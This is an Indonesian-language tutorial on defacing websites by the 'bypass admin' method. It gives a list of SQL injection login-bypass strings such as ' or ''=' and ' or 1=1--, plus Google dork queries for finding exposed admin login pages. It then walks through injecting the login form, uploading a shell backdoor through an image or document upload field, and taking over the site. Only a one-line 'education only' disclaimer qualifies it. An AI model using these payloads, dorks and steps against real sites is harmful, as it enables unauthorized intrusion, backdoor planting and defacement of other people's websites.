Deface metode bypass admin merujuk pada serangan terhadap keamanan suatu situs web dengan tujuan mengubah tampilan halaman depan atau mendapatkan akses sebagai administrator. Serangan semacam ini melibatkan eksploitasi kelemahan atau celah keamanan yang ada pada sistem atau aplikasi yang dijalankan oleh situs web.
Bahan
Penjelasan
Shell Backdoor: Shell Backdoor ini akan digunakan untuk keperluan upload file, edit file dan keperluannya lainnya.
Script Deface: Script Deface ini akan digunakan untuk mengubah tampilan server website.
Exploit Bypass Admin: Exploit ini akan digunakan supaya kalian bisa masuk kedalam dashboard admin dan upload shell backdoor kalian.
Dork Bypass Admin: Dork ini akan memudahkan kalian supaya mendapatkan target Bypass Admin lebih mudah dengan persentase lebih besar.
Exploit Bypass Admin
username & password : 'or''=' Username & Password : 1'or’1'=’1 Username & Password : admin’– Username & Password : ” or 0=0 – Username & Password : or 0=0 – Username & Password : ‘ or 0=0 # Username & Password : ” or 0=0 # Username & Password : or 0=0 # Username & Password : ‘ or ‘x’='x Username & Password : ” or “x”=”x Username & Password : ‘) or (‘x’='x Username & Password : ‘ or 1=1– Username & Password : ” or 1=1– Username & Password : or 1=1– Username & Password : ‘ or a=a– Username & Password : ” or “a”=”a Username & Password : ‘) or (‘a’='a Username & Password : “) or (“a”=”a Username & Password : hi” or “a”=”a Username & Password : hi” or 1=1 – Username & Password : hi’ or 1=1 – Username & Password : hi’ or ‘a’='a Username & Password : hi’) or (‘a’='a Username & Password : hi”) or (“a”=”)
Itu adalah daftar exploit bypass admin yang bisa kalian gunakan.
Dork Bypass Admin
inurl:/administrator/login.php inurl:/admin/index.php intext:username inurl:/administrator/login.php intext:username inurl:/admin/main.php intext:username inurl:/admin/login.html intext:login inurl:/administrator/index.php intext:login inurl:/adminweb/ intext:login.php inurl:/admin/login.php inurl:/admin/login.php intext:school inurl:/admin/login.php intext:admin login inurl:/admin/login.php intext:username inurl:/admin/login.php intext:password inirl:/admin/login.php intitle:panel inurl:/admin/addevent.php inurl:/admin/addnews.php inurl:/login.php intext:username intitle:login inurl:/login.php intext:password intitle:login intext:"welcome" inurl:/admin inurl:/admin
Itu adalah daftar dork bypass admin yang bisa kalian gunakan.
Dorking
Jika semua bahan sudah ada saatnya kalian melakukan dorking untuk mencari target yang vulnerable.
Exploit Bypass Admin
Jika sudah mendapatkan form login admin kalian masukan Exploit yang sudah aku berikan tadi.
Aku disini menggunakan Exploit 'or''=' untuk melakukan Exploitnya, Jika kalian berhasil kalian akan diarahkan ke dashboard panel admin.
Upload Shell Backdoor
Ketika kalian sudah masuk kedalam dashboard panel admin, sekarang kalian bisa melakukan edit artikel dan upload shell backdoor. untuk cara upload shell backdoor kalian cari form menu untuk upload gambar atau dokumen.
Jika shell backdoor kalian sudah diupload kalian tinggal akses shellnya dengan cara tekan lama gambar dan open new tab, jika tidak bisa kalian coba menggunakan view-source "view-source:http://target.com/[path]/[posisi kalian].php" dan cari nama file kalian dengan menu pencarian.
Jika shell backdoor sudah bisa kalian akses bebas kamu mau ngapain.
disclaimer: artikel ini hanya untuk tujuan edukasi, dan pembaca bertanggung jawab penuh atas tindakan jika mereka melakukan praktek diatas.